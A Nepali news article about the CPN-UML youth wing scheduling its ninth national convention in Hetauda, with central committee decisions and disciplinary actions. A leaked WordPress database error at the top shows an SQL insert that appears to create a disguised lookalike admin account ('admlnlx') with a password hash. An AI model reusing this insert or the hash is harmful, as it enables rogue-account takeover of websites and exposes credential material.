WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bz5K4gSbf/wpg/wf6dznq0M0Orq6td0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:07:20', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २६ –
एमालेको भातृ संगठन युवा संघ नेपालको नवौं राष्ट्रिय महाधिवेशन मकवानपुरको हेटौडमा हुने भएको छ ।
बुधबार सम्पन्न संघको केन्द्रीय कमिटी बैठकले नवौं महाधिवेशन वैशाखको ९ देखि १२ गतेसम्म मकवानपुरको हेटौडामा गर्ने निर्णय गरेको संघका प्रवक्ता प्रभातविक्रम कटवालले जानकारी दिए ।
महाधिवेशन सम्पन्न गर्न केन्द्रीय कमिटीले अध्यक्ष राजीव पहारीको नेतृत्वमा आयोजक समिति समेत बनाएको छ । ‘अब हामी राष्ट्रिय महाधिवेशनमा फोकस हुन्छौं,’ प्रवक्ता कटवालले भने– ‘केन्द्रीय कमिटीले निर्णय गरिसक्यो । संघको प्रमुख कार्यभार महाधिवेशन सफल पार्नु नै हो ।’
संघको आठौं महाधिवेशन २०६९ साल फागुन ११ देखि १५ सम्म बुटबलमा सम्पन्न भएको थियो ।
केन्द्रीय कमिटी बैठकले संगठन हित विपरित चल्ने र अन्य पार्टीका गएका केही व्यक्तिलाई कारवाही गरेको छ । संघका प्रवक्ता कटवालका अनुसार केन्द्रीय सदस्यहरुः अञ्जन भट्ट, माधव विष्ट र संघको हित विपरित लागेका बालिका खड्कालाई कारवाही गरिएको छ । केन्द्रीय सदस्य किरन पन्तलाई भने विदाई (विदेश भएकाले) गरिएको छ ।
तीन दिनसम्म चलेको केन्द्रीय कमिटी बैठकले स्थायी कमिटीको निर्णयलाई अनुमोदन गरेको छ । त्यस्तै, अध्यक्ष राजीव पहारीले प्रस्तुत गरेको राजनीतिक प्रतिवेदन, महासचिव किरण पौडेलले प्रस्तुत गरेको सांगठनिक प्रतिवेदन र कोषाध्यक्ष किरण लामाले प्रस्तुत गरेको आर्थिक प्रतिवेदन पारित गरिएको छ ।

त्यस्तै बैठकले युवा संघलाई मधेसमा केन्द्रीत गराउने निर्णय पनि गरेको छ । ‘मधेसमा कार्यक्रमहरु बढाउने, युवा संघलाई केन्द्रीत बनाउने, सम्पूर्ण समितिहरु महाधिवेशनमा लाग्ने, संगठन विस्तार अभियान द्रुत गतिमा लैजाने, मेची महाकाली अभियानमा लाग्ने, संविधान कार्यान्वयनमा युवा परिचालन गर्ने लगायत निर्णय भएका छन्,’ प्रवक्ता कटवालले भने ।
माघ २३ बाट सुरु भएको संघको केन्द्रीय कमिटीको बैठक एमाले अध्यक्ष एवं पूर्व प्रधानमन्त्री केपी शर्मा ओलीले उद्घाटन गरेका थिए ।